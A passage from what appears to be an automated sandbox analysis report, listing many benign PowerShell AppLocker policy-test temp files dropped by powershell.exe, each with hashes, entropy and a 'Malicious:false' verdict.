                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltrpfjf1.vo4.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lw4ethlx.3hr.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mgvri1hk.mkc.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nils5msq.404.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqzm3hu0.xg0.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ptqpoeod.hlt.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qa002c4r.o2l.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qeaxswax.u5a.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qje11iwe.sa5.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_quyd3vqf.gv0.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qxrnjuj2.1jy.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r2ne1l3z.f5g.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5sorno1.rzr.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s2vcdpu2.jmq.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sd2l1mzq.00n.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sujxg0zv.iwz.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tgtwl1eb.msv.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tiaubvhs.0mt.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uaii3k5p.rwr.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ui4io4un.3vn.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vnlg1jsu.4kg.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wagqy0i5.5ls.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wasl4npg.c3a.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
